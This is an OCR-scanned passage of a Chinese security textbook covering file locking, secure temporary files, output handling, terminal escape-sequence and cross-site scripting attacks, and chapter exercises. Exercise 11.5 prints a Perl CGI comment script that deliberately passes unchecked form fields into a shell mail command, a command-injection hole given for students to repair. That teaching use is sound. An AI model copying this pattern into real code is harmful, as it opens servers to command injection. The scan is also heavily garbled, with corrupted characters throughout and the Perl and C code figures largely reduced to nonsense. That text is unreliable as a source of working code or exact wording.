在 很 多 情况 下 ， 多 个 程序 需要 访问 公共 系统 资源 ， 一 个 文件 包含 多 个 程序 产生 和 操作 的 数 
据 。 例 如 ， 邮 件 客 户 端 和 邮件 投递 程序 共享 访问 用 户 信箱 中 的 文件 。 又 如 ， 一 个 Web CGI H 
本 的 多 个 用 户 更 新 一 个 保存 提交 的 表单 内 容 的 文件 。 这 是 共享 内 存 同 步 访问 问题 的 一 个 变 体 ， 
该 问题 在 11.3 节 中 我 们 已 经 进行 了 讨论 。 在 那里 ， 解 决 该 问题 的 方法 是 使 用 一 个 合适 的 同步 
机 制 使 得 访问 串 行 化 ， 这 样 就 可 以 阻止 错误 的 产生 。 和 用 的 技术 是 在 共享 的 文件 上 设 定 一 个 
锁 (lock),， 保 证 每 个 进程 轮流 访问 。 一 些 方法 可 以 实现 该 机 制 ， 但 这 些 方 法 依赖 于 使 用 的 操作 
系统 。 

最 早 也 是 最 常用 的 技术 是 使 用 一 个 文件 锁 (lockfile)。 一 个 进程 必须 创建 和 拥有 文件 锁 ， 
这 样 才 可 以 获取 对 共享 资源 的 访问 。 任 何 检测 到 文件 锁 存 在 的 其 他 进程 必须 等 待 ， 直 到 该 文件 
锁 被 撤销 ， 它 才能 创建 自己 的 文件 锁 来 获取 访问 权 。 使 用 这 种 方法 也 有 一 些 相关 的 问题 。 首 
先 ， 它 完全 是 建议 性 的 。 如 果 一 个 程序 选择 忽略 文件 锁 的 存在 并 访问 共享 资源 ， 系 统 将 不 会 阻 
止 ， 所 有 使 用 该 同步 机 制 的 程序 必须 协作 。 在 执行 中 还 会 有 更 严重 的 缺陷 出 现 ， 首 先 程序 要 检 
查 文件 锁 ， 如 果 不 存在 就 产生 一 个 。 遗 憾 的 是 这 包含 一 个 致命 的 缺陷 。 假 设 有 两 个 进程 ， 每 个 
进程 都 试图 检查 并 产生 这 个 文件 锁 。 第 一 个 进程 检查 并 确认 文件 锁 不 存在 。 然 而 ， 在 它 产生 文 
件 锁 之 前 ， 系 统 将 该 进程 挂 起 而 让 其 他 进程 运行 。 而 在 此 时 ， 为 一 个 进程 也 检查 到 文件 锁 不 存 
在 并 产生 一 个 ， 并 进一步 使 用 共享 资源 。 接 着 第 二 个 进程 也 被 挂 起 ， 控 制 返回 第 一 个 进程 ， 第 
一 个 进程 也 将 产生 文件 锁 ， 进 一 步 同时 访问 共享 资源 ， 这 时 在 共享 文件 中 的 数据 遭 到 破坏 。 这 
是 竞争 条 件 的 最 传统 的 解释 。 问 题 是 检查 文件 锁 不 存在 和 产生 文件 锁 的 过 程 必须 是 同时 进行 


© MacOSX 支持 的 F FULLFSYNC fentl 系统 调用 命令 驱动 器 刷新 永久 存储 区 的 所 有 缓冲 区 数据 。 
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的 ， 没 有 中 断 的 可 能 ， 这 种 操作 被 称 为 原子 操作 (atomic operation )。 在 这 种 情况 下 不 要 孤立 地 [387] 
检测 文件 锁 的 存在 ， 而 是 同时 试 着 创建 它 ， 这 才 是 正确 的 实现 方法 。 文 件 创建 时 使 用 的 特定 选 
项 表明 若 文件 已 存在 则 创建 操作 失败 并 返回 相应 的 错误 代码 。 如 果 创 建 失败 ， 进 程 则 等 待 一 段 
时 间 ， 然 后 再 试 ， 直 到 成 功 。 操 作 系 统 利用 一 个 原子 操作 实现 了 这 个 功能 ， 提 供 对 资源 访问 的 
控制 和 保证 。 而 使 用 文件 锁 是 一 项 传统 的 技术 ， 该 技术 的 优点 是 锁 的 存在 很 清楚 ， 因 为 文件 锁 
在 目录 列表 中 可 以 看 见 。 管 理 员 可 以 简单 地 删 掉 程序 残留 的 文件 锁 ， 它们 可 能 是 程序 崩溃 造成 
的 ， 也 可 能 是 其 他 没有 成 功 删 除 的 。 

文件 还 有 更 新 的 加 锁 机 制 。 这 可 以 是 建议 性 的 ， 也 可 以 是 强制 性 的 ， 操 作 系 统 保证 这 些 
加 锁 的 文件 能 够 被 恰当 地 访问 。 强 制 加 锁 可 以 删除 那些 在 加 锁 过 程 损 坏 的 锁 ， 或 者 未 被 释放 的 
锁 。 这 些 机 制 在 不 同 的 操作 系统 上 实现 方式 是 不 同 的 。 因 此 ， 使 用 时 必须 注意 正确 使 用 选择 的 
机 制 。 

图 11-8 说 明了 在 一 个 Perl 脚本 中 flock 的 使 用 。 我 们 通常 在 一 个 Web CGI 表单 处 理 程序 
中 使 用 它 ， 用 于 将 用 户 提 供 的 信息 添加 到 文件 中 。 随 后 ， 也 使 用 这 种 加 锁 机 制 的 另 一 个 程序 能 
够 访问 这 个 文件 ， 并 且 处 理 和 去 掉 这 些 相 应 的 细节 。 我 们 注意 到 还 有 一 些 复杂 的 问题 ， 这 些 问 
题 与 使 用 不 同类 型 的 读 写 方式 的 加 锁 文 件 相关 。 这 些 特征 的 正确 使 用 必须 参考 适当 的 程序 或 
PRA 


#!/usr/bin/perl 
a 


LOCK = 2; | 


$EXCL_LOC 
See ae \ : 


Perea Bie file sad T IAO dibiusive access leek pete ME Mor 
open (FILE, ">> $FILENAME") | | die "Failed to open eee ‘Meng pei 
flock FILE, SEXCL_ LOCK; pet 
. use exclusive access to ‘ie forminfo file to save details 

# unlock and close file 

flock FILE, $UNLOCK; 

close (FILE); 





图 11-8 Perl 中 文件 加 锁 实 例 


11.4.5 ”安全 临时 文件 的 使 用 


很 多 程序 在 处 理 数据 的 时 候 ， 需 要 存储 数据 的 临时 副本 。 临 时 文件 通常 用 于 这 一 目的 。 大 
多 数 操作 系统 提供 了 存储 临时 文件 的 位 置 ( 临 时 文件 的 位 置 很 容易 找到 ) 和 用 于 命名 和 产生 这 
些 临 时 文件 的 标准 函数 。 有 关 临 时 文件 的 关键 问题 是 ， 它 们 应 该 是 唯一 的 并 且 不 能 被 其 他 进程 [388 
访问 。 从 某 种 意义 上 讲 ， 这 与 管理 共享 文件 的 访问 是 对 立 的 。 构 造 文件 名 的 一 般 技术 是 在 名 字 
中 包含 一 个 值 ， 如 进程 标识 符 ( process identifier)。 由 于 每 个 进程 有 不 同 的 标识 符 ， 这 就 保证 
了 文件 名 的 唯一 性 。 程 序 通 过 检查 确认 文件 不 存在 ， 然 后 产生 临时 文件 。 这 种 方法 从 可 靠 性 的 
观点 来 看 是 足够 的 ， 但 从 安全 的 观点 来 看 还 是 不 够 的 。 

事实 上 ， 攻 击 者 不 会 依据 规则 行事 。 他 们 试图 猜测 某 些 特权 程序 将 要 使 用 的 临时 文件 名 ， 
在 程序 检查 文件 不 存在 和 产生 临时 文件 的 两 个 动作 之 间 试 图 产生 一 个 临时 文件 。 这 是 竞争 条 件 
的 另 一 个 实例 ， 它 与 两 个 进程 竞争 访问 一 个 没有 加 锁 的 共享 文件 的 情形 非常 相似 。 在 文献 
[WHEE03] 中 有 这 样 一 个 著名 的 例子 ， 文 件 完整 性 验证 程序 2 Tripwire 的 某 些 版 本 一 直 受到 这 


© Tripwire 是 用 于 扫描 系统 中 所 有 目录 和 文件 ， 检 测 重要 文件 是 否 发 生 非 授权 改变 的 工具 。Tripwire 可 以 用 于 
检测 攻击 者 是 否 暗 中 在 试图 破坏 系统 ， 也 可 以 检测 引起 非 期 望 的 文件 变化 的 不 正确 的 程序 行为 。 
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个 bug 的 困扰 。 攻 击 者 编写 一 个 脚本 重复 猜测 使 用 的 临时 文件 名 并 建立 一 个 指向 口令 文件 的 符 
号 链接 (symbolic link)。 因 为 访问 口令 文件 是 受 限制 的 ， 攻击 者 不 能 将 内 容 写 入 口令 文件 。 然 
而 ，tripwire 程序 具有 root 用 户 权 限 ， 因 此 可 以 访问 系统 中 的 所 有 文件 。 如 果 攻 击 者 攻击 成 功 ， 
tripwire 程序 将 可 以 通过 符号 链接 将 口令 文件 作为 临时 文件 使 用 ， 破坏 所 有 用 户 的 登录 信息 ， 
拒绝 系统 的 所 有 访问 ， 直 到 管理 员 用 备份 的 口令 文件 代替 当前 的 口令 文件 ， 这 种 情况 才 会 改 
变 。 这 是 一 种 针对 目标 系统 的 非常 有 效 但 并 不 方便 的 拒绝 服务 攻击 ， 这 表明 安全 地 管理 临时 文 
件 是 非常 重要 的 。 

安全 临时 文件 的 产生 和 使 用 更 需要 使 用 随机 的 临时 文件 名 。 文 件 名 的 产生 应 该 使 用 原子 
操作 ， 正 如 文件 锁 的 产生 过 程 那样 。 这 将 阻止 竞争 条 件 的 产生 和 文件 的 潜在 利用 。C 语言 的 标 
HERR mkfile() 适合 用 于 此 目的 ， 然 而 旧 的 函数 tmpfile()、tmpname() 和 tempnam() 都 是 不 安全 
的 ， 使 用 时 要 小 心 。 对 文件 实现 最 小 访问 也 是 非常 重要 的 ， 在 大 多 数 情 况 下 ， 只 有 创建 该 文 
件 的 程序 的 所 有 者 才 可 以 访问 。GNOME 编程 指南 (the GNOME Programming Guidelines) 推 
荐 : 在 Linux 和 UNIX 系统 中 使 用 图 11-9 所 示 的 C 语言 代码 在 共享 目录 中 产生 临时 文件 。 尽 
管 代码 中 调用 了 不 安全 的 函数 tetmpnam()， 但 它 通过 使 用 适当 限制 文件 产生 标记 的 循环 来 弥补 
安全 方面 的 不 足 。 当 程序 不 再 使 用 文件 时 ， 必 须 关 闭 文件 并 删除 其 链接 。Perl 程序 员 可 以 使 用 
File::Temp 模块 安全 地 创建 临时 文件 。 使 用 其 他 语言 的 程序 员 也 应 该 采用 相应 的 方法 保证 临时 
文件 的 安全 性 。 


e= a (NULE, ， "foo"); 
.lena EAE o EXCL 4 G TRUNC W 0 RDwR， 0600); 





i nile ea = ahr ha 
图 11-9 C 语 言 的 临时 文件 建立 实例 


当 在 共享 的 临时 目录 中 创建 文件 时 ， 其 权限 应 指定 为 仅 文件 的 所 有 者 或 者 系统 管理 员 可 
以 删除 它 。 通 常 这 并 不 是 默认 的 权限 设置 ， 必 须 进 行 修改 才能 保证 对 这 些 文件 的 安全 使 用 。 
正如 在 4.4 节 和 25.3 节 中 讨论 的 ,在 Linux Al UNIX 系统 中 需要 在 临时 目录 中 设置 防 删除 位 


(sticky permission bit) 。 


11.4.6 与 其 他 程序 进行 交互 


除了 使 用 操作 系统 和 标准 库 函 数 提供 的 功能 ， 程 序 也 可 以 使 用 其 他 程序 提供 的 服务 。 在 和 
其 他 程序 进行 交互 时 ， 应 十 分 小 心 ， 任 何 对 于 程序 间 数 据 流 规模 和 解释 的 错误 假设 都 可 能 导致 
安全 漏洞 。 我 们 在 11.2 节 中 讨论 过 一 些 与 处 理 程序 输入 相关 的 问题 ， 在 11.5 节 中 我 们 将 讨论 
程序 输出 。 程 序 间 的 信息 流 可 以 被 看 作 一 个 程序 的 输出 形成 为 一 个 程序 的 输入 。 当 程序 在 初始 
设计 的 时 候 并 没有 考虑 当前 使 用 的 情况 ， 因 而 也 并 不 能 充分 识别 所 有 可 能 出 现 的 安全 漏洞 ， 这 
时 需要 给 予 特 别 的 关注 。 特 别 地 ， 目 前 的 趋势 是 提供 Web 接口 给 用 户 先 前 在 服务 器 系统 上 直 
接 运行 的 程序 ， 这 会 导致 安全 漏洞 。 理 想 情 况 是 把 所 有 程序 都 设计 为 自己 处 理 安全 事件 ， 并 在 
编码 时 采用 防御 性 程序 设计 ， 但 现实 并 非 如 此 。 因 此 ， 负 担 便 转 嫁 到 新 开发 的 程序 上 ， 我 们 在 
使 用 以 前 编写 的 程序 时 ， 必 须 识 别 和 处 理 可 能 出 现 的 安全 问题 。 

进一步 需要 关注 的 问题 与 保护 多 个 程序 间 数 据 流 的 机 密 性 和 完整 性 有 关 。 当 多 个 程序 运行 
在 同一 个 计算 机 系统 上 时 ,合理 使 用 比如 管道 和 临时 文件 等 系统 功能 可 以 提供 这 样 的 保护 。 如 
果 程 序 运 行 在 不 同 的 系统 上 ， 系 统 间 通过 网 络 相 连 ， 那 么 这 些 网 络 连接 应 该 使 用 相应 的 安全 机 
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制 。 可 供 选 择 的 安全 机 制 有 IP Security (IPSec), Transport Layer/Security Socket Layer Security 
( TLS/SSL) 或 Secure Shell (SSH) 连接 。 即 使 在 使 用 良好 的 标准 化 协议 时 ， 也 必须 要 尽 可 能 小 
心间 愤 ， 以 确保 这 些 协议 都 使 用 了 高 强度 的 加 密 ， 因 为 许多 算法 及 其 实现 方法 都 俊 露 出 了 弱点 
[SIMP11]。 我 们 将 在 第 22 章 讨 论 这 些 话题 。 

从 安全 的 角度 讲 ， 检 测 和 处 理 程序 交互 中 产生 的 异常 和 错误 也 很 重要 。 当 一 个 进程 调用 男 
一 个 程序 作为 子 进程 时 ， 父 进程 必须 保证 子 进程 正常 终止 并 接受 它 的 退出 状态 。 进 程 还 必须 捕 
获 并 处 理 与 其 他 程序 或 操作 系统 交互 过 程 中 产生 的 信和 号 。 


11.5 “处 理 程 序 输出 


我 们 的 程序 模型 的 最 后 一 个 组 件 就 是 输入 数据 经 过 处 理 和 相互 作用 后 产生 的 输出 。 这 些 输 
出 可 能 被 保存 下 来 为 以 后 使 用 (如 保存 在 文件 或 数据 库 中 )， 或 者 通过 网 络 传输 ， 或 者 显示 给 
其 他 用 户 。 和 程序 输入 一 样 ， 输 出 数据 也 可 以 分 成 二 进 制 数据 或 文本 数据 。 二 进 制 数据 可 以 编 
码 成 复杂 结构 ， 比 如 X-Windows 显示 系统 用 以 创建 和 操作 复杂 图 形 接口 显示 组 件 所 使 用 的 结 
构 。 数 据 也 可 以 是 复杂 的 二 进 制 网 络 协议 结构 。 若 描述 文本 信息 ， 则 数据 可 能 采用 一 些 字符 集 
进行 编码 并 可 能 表示 为 一 些 结构 化 的 输出 ， 如 HTML. 

在 所 有 情况 下 ， 从 程序 安全 的 角度 讲 ， 输 出 和 预想 的 形式 相符 合 是 很 重要 的 。 如 果 直 接 传递 
给 用 户 ， 输 出 数据 可 能 被 一 些 程序 和 设备 解释 并 显示 。 如 果 输 出 中 包含 了 意外 的 内 容 ， 就 有 可 能 
发 生 异 常事 件 ， 对 用 户 产生 不 利 影响 。 这 里 的 关键 问题 是 存在 一 个 常见 的 假设 。 如 果 用 户 正 在 和 
程序 交互 ,假设 看 到 的 所 有 输出 是 该 程序 创建 的 ,或 者 至 少 是 程序 确认 过 的 。 然 而 ， 正 如 我 们 
在 11.2 节 讨 论 的 跨 站 点 脚本 (XXS) 攻击 中 所 指出 的 ， 这 个 假设 可 能 不 成 立 。 一 个 程序 可 能 接 
受 一 个 用 户 的 输入 并 保存 ， 随 后 将 它 显示 给 男 外 的 用 户 。 如 果 该 输入 包含 一 些 内 容 ， 它 们 可 以 改 
变 显示 数据 的 程序 和 设备 的 行为 ， 而 且 程 序 没有 完全 清除 这 些 内 容 ， 就 可 能 对 用 户 造 成 攻击 。 

举 两 个 例子 。 第 一 个 例子 涉及 使 用 的 纯 文本 终端 ， 如 VT100， 当 它 与 系统 进行 交互 9 时 ， 
一 个 简单 的 基于 文本 的 程序 在 典型 的 分 时 系统 上 运行 。 这 些 终 端 通常 支持 一 系列 的 功能 键 ， 编 
写 这 个 程序 要 求 当 按 下 这 些 功 能 键 时 可 以 发 送 任何 需要 的 字符 序列 ， 程 序 通 过 发 送 一 个 特定 的 
转 义 (escape) 序列 实现。 终端 识别 这 些 序列 ， 不 是 将 这 些 字符 显示 出 来 ， 而 是 执行 请 求 的 操 
作 。 除 了 对 功能 键 进行 编程 外 ， 其 他 的 转 义 序列 可 以 用 来 控制 文本 输出 的 格式 (如 加 粗 、 下 划 
线 等 )， 改 变 当 前 光标 的 位 置 。 需 要 说 明 的 是 ， 功 能 键 的 当前 内 容 应 该 被 发 送 ， 就 像 用 户 按 下 
了 对 应 的 键 。 利 用 上 面 的 功能 可 以 实现 一 个 经 典 的 针对 用 户 的 命令 行 注入 攻击 程序 ， 几 年 前 一 
个 学 生 编 写 的 这 样 一 个 恶作剧 程序 就 流传 很 广 。 攻 击 者 操纵 正常 用 户 在 其 终端 上 显示 一 些 经 过 
仔细 设计 的 文本 。 这 可 以 通过 诱 使 正常 用 户 运行 一 个 程序 实现 ， 比 如 将 程序 包含 在 电子 邮件 
中 ,或 者 直接 写 在 其 终端 上 ， 如 果 用 户 允 许 的 话 。 除 了 显示 一 些 无 关 的 信息 扰乱 正常 用 户外 ， 
文本 中 还 可 以 包含 一 些 转 义 序列 ， 首 先 编程 实现 发 送 特定 命令 的 功能 键 ， 接 着 是 发 送 文本 的 命 
令 ， 就 好 像 经 编程 的 功能 键 被 按 下 一 样 。 如 果 显 示 文 本 的 程序 不 久 就 退出 了 ， 那么 它 发 送 的 对 
应 特定 功能 键 的 文本 就 被 视 为 目标 用 户 键入 的 下 一 个 命令 。 因 而 ， 攻 击 者 可 以 完成 该 用 户 的 所 
有 操作 ， 可 能 包括 删除 用 户 文件 或 更 改 用 户 的 口令 。 使 用 这 种 简单 形式 的 攻击 ， 用 户 会 看 到 这 
些 命令 和 响应 被 显示 。 虽 然 用 户 知道 已 经 受到 攻击 ， 但 来 不 及 阻止 攻击 。 如 果 加 入 另外 一 些 转 
义 序列 的 组 合 ， 攻 击 者 就 可 以 隐藏 这 些 信 息 ， 阻 止 它们 被 显示 ， 这 样 用 户 通过 直接 观察 无 法 察 
觉 是 否 受 到 攻击 ， 直 到 攻击 的 后 果 变 得 越 来 越 明 显 。 该 攻击 的 新 版 本 利用 没有 被 充分 保护 的 


日 ” 当 在 一 个 本 地 或 远程 系统 与 一 个 命令 行 的 shell 交互 时 ， 通 常 终端 程序 仿真 一 个 设备 。 
O ”这样 设 计 是 因为 这 些 序 列 几 乎 一 直 以 ASCII 字符 集中 的 转 义 字符 (ESC) 开始 。 
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X-terminal 显示 功能 ， 可 以 达到 截获 和 控制 一 个 或 多 个 用 户 会 话 的 目的 。 

在 这 个 例子 中 ， 我 们 吸取 的 主要 教训 与 用 户 期 望 的 发 送 到 用 户 终端 显示 的 输出 数据 的 类 型 
有 关 。 用 户 期 望 显 示 的 输出 是 纯 文本 。 如 果 一 个 程序 如 文本 编辑 占 或 邮件 客户 端 使 用 格式 化 文 
本 或 可 编程 功能 键 ， 我 们 假设 程序 不 会 滥用 这 些 功 能 。 并 且 用 户 遇 到 的 大 多 数 这 类 程序 遵从 上 
面 的 约定 。 例 如 邮件 客户 端 ， 它 显示 来 自 其 他 用 户 的 数据 ， 需 要 对 文本 内 容 进 行 过 滤 ， 保 证 里 
面 的 转 义 字符 不 被 执行 。 用 户 的 任务 是 检查 其 他 不 可 信和 的 程序 ， 必 要 的 时 候 可 以 对 输出 进行 过 
滤 ， 阻 止 攻 击 的 发 生 。 男 一 个 教训 是 要 确保 不 可 信 资 源 不 允许 直接 输出 到 用 户 界面 上 ， 特别 是 
在 随后 的 这 种 攻击 的 X-terminal 变 体 中 。 如 果 是 传统 的 终端 ， 这 意味 着 不 允许 其 他 用 户 直 接 癌 
用 户 输出 上 写 消息 。 如 果 是 X-terminal， 意 味 着 配置 认证 机 制 保 证 只 允许 在 用 户 命 令 下 运行 的 
程序 可 以 访问 用 户 的 显示 做。 

第 二 个 例子 是 利用 一 些 Web 服务 器 上 的 留言 板 进行 的 路 站 点 脚本 (XSS) 攻击 。 如 果 该 留 
言 板 应 用 程序 没有 充分 检查 和 清理 用 户 提供 的 输入 ， 那 么 接 下 来 在 用 户 浏览 这 些 留言 时 这 个 输 
和 人 能够 用 于 实现 一 次 攻击 。 这 种 攻击 利用 了 Web 浏览 器 在 从 站 点 查看 内 容 时 所 使 用 的 假设 和 
安全 模型 。 浏 览 器 假设 所 有 内 容 都 是 那个 站 点 产生 的 ， 也 是 同等 可 信 的 。 这 就 允许 可 编程 内 容 
如 JavaScript 访问 或 修改 站 点 的 数据 或 元 数据 ， 例 如 和 那个 站 点 相关 的 cookie。 这 里 的 问题 在 
于 并 不 是 所 有 数据 都 是 该 站 点 产生 或 者 在 该 站 点 的 控制 下 产生 的 。 可 能 有 些 数据 来 自 不 可 信 的 
iF. 

任何 收集 或 依赖 第 三 方 数据 的 程序 都 必须 负责 保证 数据 对 于 后 续 的 用 户 是 安全 的 ， 不 会 
违反 用 户 的 假设 。 这 些 程序 必须 区 分 哪些 输出 是 允许 的 ， 并 且 过 滤 掉 任何 不 可 信和 数据 ， 保 证 只 
有 有 效 的 输出 被 显示 。 最 简单 的 过 滤 方 法 是 删除 所 有 的 HTML 标记 。 这 当然 会 使 输出 变 得 安 
全 ， 但 是 这 与 一 些 使 输出 格式 化 的 需求 相 冲 突 。 那 么 可 以 选择 仅 保留 安全 的 标记 。 与 对 输入 进 
行 过 滤 一 样 ， 我 们 的 重心 在 于 仅 保 留 安 全 的 标记 而 不 是 试图 将 危险 的 标记 删除 ， 因 为 对 于 危险 
(dangerous) 的 解释 可 能 随时 间 而 变化 。 

这 里 涉及 的 另外 一 个 问题 是 不 同 的 字符 集 允 许 对 元 字符 的 不 同 编码 方式 ， 这 会 改变 对 有 效 
输出 的 解释 。 如 果 特 定 的 显示 程序 或 设备 对 于 采用 的 具体 的 编码 方式 并 不 知情 ， 可 能 引发 对 程 
序 的 不 同 假设 ， 从 而 可 能 导致 过 滤 失 败 。 因 此 ， 对 程序 而 言 要 么 明确 指定 可 能 的 编码 方式 ， 要 
么 保证 编码 方式 和 显示 意愿 相符 合 ， 这 是 很 重要 的 。 这 就 是 输出 标准 化 ， 程 序 保证 输入 数据 有 
一 个 公共 的 最 小 可 选集 合 。 在 网 页 输出 时 ， 为 Web 服务 器 明确 指定 在 Content-Type HTTP 响应 
k (response header) 中 采用 的 字符 集 ， 这 是 可 能 的 。 不 幸 的 是 ， 有 时 我 们 无 法 指定 。 如 果 无 法 
指定 ， 浏 览 锅 会 假设 一 个 默认 使 用 的 字符 集 。 这 个 假设 没有 被 系统 化 ， 因 此 不 同 的 浏览 器 会 做 
出 不 同 的 选择 。 如 果 需 要 过 滤 和 输出， 就 应 该 指定 字符 集 。 

我 们 注意 到 这 些 例子 的 安全 漏洞 都 是 由 程序 输出 导致 的 。 但 是 威胁 的 目标 不 是 产生 输出 的 
程序 ， 而 是 用 来 显示 输出 的 程序 或 设备 。 我 们 可 以 认为 这 和 程序 员 没 有 关系 ， 因 为 程序 本 身 并 
没有 错误 。 然 而 ， 如 果 程 序 被 用 作 攻 击 工 具 ， 程序 员 的 名 声 也 会 被 下 污 ， 用 户 就 不 愿 使 用 这 些 
程序 。 在 XSS 攻击 的 案例 中 ， 很 多 知名 的 站 点 受到 替 连 ， 并 且 遭 受到 不 利 影响 。 


11.6 关键 术语 、 复 习题 和 习题 


关键 术语 
atomic operation (原子 操作 ) command injection (命令 注入 ) 
canonicalization (规范 化 ) cross-site scripting (XSS) attack (路 网 站 脚本 攻击 ) 


code injection (代码 注入 ) defensive programming (防御 性 程序 设计 ) 
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environment variable (环境 变量 ) regular expression (正则 表达 式 ) 
fuzzing (fuzzing 技术 ) secure programming (安全 程序 设计 ) 
injection attack (注入 攻击 ) software quality (软件 质量 ) 

least privilege (最 小 特权 ) software reliability (软件 可 靠 性 ) 
memory leak (内 存 泄漏 ) software security (软件 安全 ) 
privilege escalation (特权 扩大 ) SQL injection (SQL 注入 ) 

race condition (竞争 条 件 ) XSS reflection (XSS 反射 ) 

复习 题 


11.1 
11.2 
11.3 
11.4 
11.5 
11.6 
11.7 
11.8 
11.9 
11.10 
11.11 
11.12 
11.13 
11.14 
11.15 
11.16 


习题 
11.1 
11.2 


11.3 


11.4 


11.5 


试 述 软件 质量 和 可 靠 性 与 软件 安全 的 区 别 。 
试 述 什么 是 防御 性 程序 设计 。 
列 出 一 些 可 能 的 程序 输入 资源 。 
给 出 注入 攻击 的 定义 ,列举 一 些 注入 攻击 的 例子 。 注 入 攻击 通常 在 什么 环境 下 被 发 现 ? 
叙述 命令 攻击 和 SQL 注入 攻击 的 相同 点 和 不 同 点 。 
试 述 什么 是 跨 站 点 脚本 攻击 ， 列 举 一 些 这 类 攻击 的 例子 。 
叙述 一 个 程序 员 在 对 程序 输入 的 假设 进行 验证 时 使 用 的 主要 技术 。 
叙述 在 使 用 Unicode 字符 集 进 行 输入 验证 时 可 能 出 现 的 问题 。 
给 出 输入 的 fuzzing 技术 的 定义 ,叙述 在 什么 情况 下 可 以 使 用 该 技术 。 
列举 几 个 与 编写 安全 程序 代码 相关 的 软件 安全 问题 。 
给 出 竞争 条 件 的 定义 ， 叙述 在 多 个 进程 访问 共享 内 存 时 竞争 条 件 是 怎样 产生 的 。 
指出 在 shell 脚本 中 使 用 环境 变量 时 相关 的 问题 。 
给 出 最 小 特权 原则 的 定义 。 
指出 与 文件 锁 的 正确 产生 和 使 用 相关 的 问题 。 
在 共享 目录 中 可 以 正确 创建 和 使 用 临时 文件 ， 指 出 与 此 有 关 的 问题 。 
列举 当 一 个 程序 将 未 经 验证 的 输入 从 一 个 用 户 发 送 到 另 一 个 用 户 时 可 能 产生 的 问题 。 


探讨 在 不 同 的 语言 环境 中 如 何 编写 正则 表达 式 或 样本 。 

在 Linux/UNIX 系统 上 脚本 运行 其 他 命令 时 通常 使 用 Bourne shell, THEI shell 使 用 的 所 有 元 字符 
的 含义 。 将 该 列表 和 其 他 常用 的 shell 如 BASH 或 CSH 使 用 的 元 字符 列表 相 比 较 。 为 了 防止 命令 
注入 攻击 进行 的 输入 有 效 性 检查 表明 了 什么 ? 

重 写 图 11-2 所 示 的 Perl finger CGI 脚本 ， 使 其 包括 适当 的 输入 验证 和 更 多 的 错误 信息 ， 如 本 章 脚注 
3 所 建议 的 那样 。 扩 展 输入 验证 使 其 允许 字符 一 、 十 、% 出 现在 $user 值 中 间 ， 但 不 能 出 现在 该 值 
的 开始 或 结束 位 置 。 进 一 步 考虑 允许 空格 或 tab 出 现在 该 值 中 的 情况 。 由 于 这 些 值 将 参数 和 shell 
命令 分 开 ， 当 传递 给 finger 命令 时 ，S$user 值 必 须 被 引号 括 起 来 。 考 虑 这 是 如 何 实 现 的 。 如 果 可 能 
的 话 ， 将 你 修改 的 脚本 以 及 用 来 调用 它 的 表单 复制 到 Linux/UNIX Web 服务 器 上 ， 验 证 操作 是 否 
正确 。 

增强 用 来 给 你 的 服务 器 的 网 络 管理 员 发 送 注释 的 CGI 处 理 脚本 的 安全 性 。 当 前 使 用 的 脚本 如 
11-10a 所 示 ， 相 应 的 表单 在 图 11-10b 中 。 考 察 该 脚本 中 出 现 的 安全 问题 。 列 出 改正 所 需 的 详细 
步骤 ， 设 计 一 个 该 脚本 的 增强 版 。 

研究 PHP 或 其 他 合适 的 Web 脚本 语言 中 的 一 些 可 用 函数 ， 它 们 用 来 清洁 随后 在 SQL 查询 中 使 用 
的 数据 。 


282 PZR RHP AZA 


#!/usr/bin/perl 

# comment.cgi - send comment to webmaster 
# specify recipient of comment email 

$to = "webmaster"; 


use CGI; 
use CGI::Carp qw(fatalsToBrowser) ; 
$q = new CGI; # create query object 


# display HTML header 

print $q->header, 
$q->start_html('Comment Sent'), 
$q->hi('Comment Sent’); 


# retrieve form field values and send comment to webmaster 
$subject = $q->param("subject") ; 

$from = $q->param("from") ; 

Sbody = $q->param("body") ; 


# generate and send comment email $ 
system("export REPLYTO=\"$from\"; echo \"Sbody\" | mail -s \"Ssubject\" 
Sito”) 3 


+ indicate to user that email was sent 
print “Thank you for your comment on $subject."; 
print "This has been sent to $to."; 


# display HTML footer > 
print $q->end_html; 





a) 注释 CGI 脚本 


<html><head><title>Send a SRR e r pt ee 
<hl> Send a Comment </h1> : 

<form method=post action="comment. cgi wy | | . 
<b>Subject of this comment</b>: <input type=text name=subject value=""> 
<b>Your Email Address</b>: <input type=text name=from value=""> 


<p>Please enter comments here: 

<p><textarea name="body”" rows=15 cols=50></textarea> 
<p><input type=submit value="Send Comment"> 

<input type="reset" value="Clear Form"> 
</form></body></html> - 





b) Web 注释 表单 
图 11-10 注释 表单 处 理 练习 


11.6 研究 PHP 或 其 他 合适 的 Web 脚本 语言 中 的 一 些 可 用 也 数 ， 它 们 用 来 解释 表单 数据 中 使 用 的 HTML 
Al URL 编码 ， 在 检查 或 进一步 使 用 前 将 其 值 规范 化 。 

11.7 增强 程序 安全 性 的 一 个 方法 是 使 用 fuzzing 工具 。 正 如 在 11.2 节 中 介绍 的 ， 这 些 测试 程序 使 用 大 量 
自动 产生 的 输入 。 考 查 一 些 你 所 熟知 的 系统 上 的 fuzzing 工具 。 分 析 其 代价 、 可 用 性 和 易 用 性 。 思 
考 适 合 使 用 这 些 工 具 的 开发 项 目的 类 型 。 

11.8 增强 程序 安全 性 的 另 一 个 方法 是 使 用 静态 分 析 工 具 ， 扫 描 程 序 代码 发 现 程序 漏洞 。 考 查 一 些 针 对 
你 所 熟悉 语言 的 静态 分 析 工 具 。 分 析 其 代价 、 可 用 性 以 及 易 用 性 。 思 考 适 合 使 用 这 些 工具 的 开发 
项 目的 类 型 。 

1.9 查看 你 所 使 用 的 系统 的 所 有 环境 变量 的 当前 值 。 如 果 可 能 的 话 ， 分 析 这 些 值 的 使 用 。 思 考 如 何 为 
单个 进程 以 及 其 子 进程 临时 修改 这 些 值 以 及 为 后 续 的 系统 登录 永久 改变 这 些 值 。 

11.10 在 Linux/UNIX 系统 上 ， 尝 试 使 用 你 自己 的 小 数据 文件 检测 图 11-6a 和 图 11-6b 中 有 漏洞 的 shell 
脚本 。 先 修改 PATH 环境 变量 的 值 ， 接 着 修改 IFS 变量 的 值 ， 使 脚本 执行 你 所 选择 的 其 他 程序 。 
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操作 系统 安全 





学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

o 列 出 系统 安全 加 固 过 程 中 所 需 的 步骤 ; 
详 述 规划 系统 安全 的 需求 ; 
列 出 用 于 加 固 基本 操作 系统 的 基本 步骤 ; 


列 出 用 于 加 固 关 键 应 用 所 需 的 额外 步骤 ; 

列 出 维护 系统 安全 所 需 的 步骤 ; 

列 出 加 固 UNIX/Linux 系统 的 一 些 特 定 方面 ; 
列 出 加 固 Windows 系统 的 一 些 特 定 方面 ; 

